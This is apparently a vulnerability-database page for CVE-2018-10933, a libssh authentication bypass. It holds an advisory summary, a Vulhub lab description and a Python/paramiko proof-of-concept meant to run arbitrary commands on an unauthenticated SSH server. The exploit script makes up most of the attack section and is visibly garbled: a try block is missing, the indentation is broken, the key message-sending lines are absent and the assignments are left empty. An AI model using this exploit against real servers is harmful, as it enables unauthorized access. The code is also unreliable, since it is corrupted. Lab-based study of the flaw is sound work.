9.1 / 10

A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.

Weakness: Improper Authentication

When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.

Published: 2018-10-17

Community Advisory

This section is open source, for any additional information that enhances or clarifies the official advisory above.

Improve Advisory

CVE-2018-10933 Exploits (35)

Show all exploits (+25):

CVE-2018-10933 Vulnerable Docker Environment

Vulhub is an open-source collection of Docker-ized vulnerable environments. No pre-existing knowledge of Docker is required, just execute two simple commands and you have a vulnerable environment.

Get Vulhub Docker

libssh Authentication Bypass Vulnerability(CVE-2018-10933)

libssh is a multiplatform C library implementing the SSHv2 protocol on client and server side. A logic vulnerability was found in libssh's server-side state machine. The attacker can send the MSG_USERAUTH_SUCCESS message before the authentication succeed. That can bypass the authentication and access the target SSH server.




Start the environment:

docker-compose up -d

After the environment is started, we can connect the your-ip:2222 port (account password: myuser:mypassword), which is a legal ssh login:


Referring to the POC given in, we can use the following script to proof the vulnerability.

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048

def execute(hostname, port, command):
    sock = socket.socket()
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)


        client = transport.open_session(timeout=10)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output =
        error =


        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None

if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

You can execute arbitrary commands on the target server like following:

Research Labs

Official CVE References

View references (11)